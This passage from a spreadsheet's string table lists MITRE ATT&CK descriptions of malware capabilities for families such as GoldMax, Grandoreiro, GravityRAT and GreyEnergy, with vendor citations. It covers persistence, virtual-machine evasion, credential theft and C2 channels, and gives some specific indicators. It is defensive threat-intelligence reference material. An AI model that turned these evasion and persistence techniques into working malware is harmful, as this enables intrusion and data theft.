    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on network settings and Internet proxy settings from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on programs and services on the victim that are configured to automatically run at startup.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) encrypts data using Base64 before being sent to the command and control server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) terminates anti-malware processes if they’re found running on the system.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) deletes one of its files, 2.hwp, from the endpoint after establishing persistence.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) lists the directories for Desktop, program files, and the user’s recently accessed files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) can download additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) stores information gathered from the endpoint in a file named 1.hwp.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks the running processes on the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) enumerates registry keys with the command &lt;code&gt;regkeyenum&lt;/code&gt; and obtains information for the Registry key &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) establishes persistence in the Startup folder.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks for anti-malware products and processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects endpoint information using the &lt;code&gt;systeminfo&lt;/code&gt; command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses cmd.exe to execute commands for discovery.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldFinder](https://attack.mitre.org/software/S0597) logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.(Citation: MSTIC NOBELIUM Mar 2021)  </t>
  </si>
  <si>
    <t>Internet Connection Discovery</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has RSA-encrypted its communication with the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can exfiltrate files over the existing C2 channel.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can download and execute additional files.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used decoy traffic to surround its malicious network traffic to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has impersonated systems management software to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has written AES-encrypted and Base64-encoded configuration files to disk.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has been packed for obfuscation.(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) will check if it is being run in a virtualized environment by comparing the collected MAC address to &lt;code&gt;c8:27:cc:c2:37:5a&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) retrieved a list of the system's network interface after execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldMax](https://attack.mitre.org/software/S0588) can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) </t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can spawn a command shell, and execute native commands.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has included a program "ExeProtector", which monitors for the existence of [GoldenSpy](https://attack.mitre.org/software/S0493) on the infected system and redownloads if necessary.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) constantly attempts to download and execute files from the remote C2, including [GoldenSpy](https://attack.mitre.org/software/S0493) itself if not found on the system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder &lt;code&gt;%WinDir%\System32\PluginManager&lt;/code&gt;.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the &lt;code&gt;WinExec()&lt;/code&gt; API.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has gathered operating system information.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to  enumerate the infected system's user name via &lt;code&gt;GetUserNameW&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on window names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use SSL in C2 communication.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can utilize web services including Google sites to send and receive C2 data.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use malicious browser extensions to steal cookies and other user information.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can bypass UAC by registering as the default handler for .MSC files.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can capture clipboard data from a compromised host.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal cookie data and credentials from Google Chrome.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can obtain C2 information from Google Docs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can decrypt its encrypted internal strings.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used compromised websites and Google Ads to bait victims into downloading its installer.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can parse Outlook .pst files to extract e-mail addresses.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can send data it retrieves to the C2 server.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can delete .LNK files created in the Startup folder.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can download its second stage from a hardcoded URL within the loader's code.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can log keystrokes on the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has infected victims via malicious attachments.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used malicious links to gain execution on victim machines.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has named malicious browser extensions and update files to appear legitimate.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can store its configuration in the Registry at &lt;code&gt;HKCU\Software\&lt;/code&gt; under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can execute through the &lt;code&gt;WinExec&lt;/code&gt; API.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>The [Grandoreiro](https://attack.mitre.org/software/S0531) payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on process names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use run keys and create link files in the startup folder for persistence.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Grandoreiro](https://attack.mitre.org/software/S0531) can write or modify browser shortcuts to enable launching of malicious browser extensions.(Citation: IBM Grandoreiro April 2020) </t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has been spread via malicious links embedded in e-mails.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal the victim's cookies to use for duplicating the active session from another device.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can detect VMWare via its I/O port and Virtual PC via the &lt;code&gt;vpcext&lt;/code&gt; instruction.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the computer name and OS version from a compromised host.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the IP and physical location of the compromised host via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the username from the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the time on the victim machine via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use VBScript to execute malicious code.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the binary ACL to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files based on an extension list if a USB drive is connected to the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>Dynamic Data Exchange</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has been delivered via Word documents using DDE for execution.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>The author of [GravityRAT](https://attack.mitre.org/software/S0237) submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has used HTTP over a non-standard port, such as TCP port 46769.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) supports file encryption (AES with the key "lolomycin2017").(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) lists the running processes on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) creates a scheduled task to ensure it is re-executed everyday.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses WMI to check the BIOS and manufacturer information for strings like "VMWare", "Virtual", and "XEN" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the MAC address, computer name, and CPU information.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim IP address, MAC address, as well as the victim account domain name.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses the &lt;code&gt;netstat&lt;/code&gt; command to find open ports on the victim’s machine.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim username along with other account information (account type, description, full name, SID and status).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has a feature to list the available services on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) can obtain the date and time of a system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses HTTP for C2.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) executes commands remotely on the infected host.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using RSA-2048.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) digitally signs the malware with a code-signing certificate.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) can download additional modules and payloads.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to harvest pressed keystrokes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module for [Mimikatz](https://attack.mitre.org/software/S0002) to collect Windows credentials from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) modifies conditions in the Registry and adds keys.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has used Tor relays for Command and Control servers.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts its configuration files with AES-256 and also encrypts its strings.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) has a module to inject a PE binary into a remote process.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) is packed for obfuscation.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using AES256.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) enumerates all Windows services.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses HTTP and HTTPS for C2 communications.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) uses cmd.exe to execute itself in-memory.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GreyEnergy](https://attack.mitre.org/software/S0342) chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can delete its executable from the &lt;code&gt;AppData\Local\Temp&lt;/code&gt; directory on the compromised host.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>The [GuLoader](https://attack.mitre.org/software/S0561) executable has been retrieved via embedded macros in malicious Word documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has relied upon users clicking on links to malicious documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can establish persistence via the Registry under &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has been spread in phishing campaigns using malicious web links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
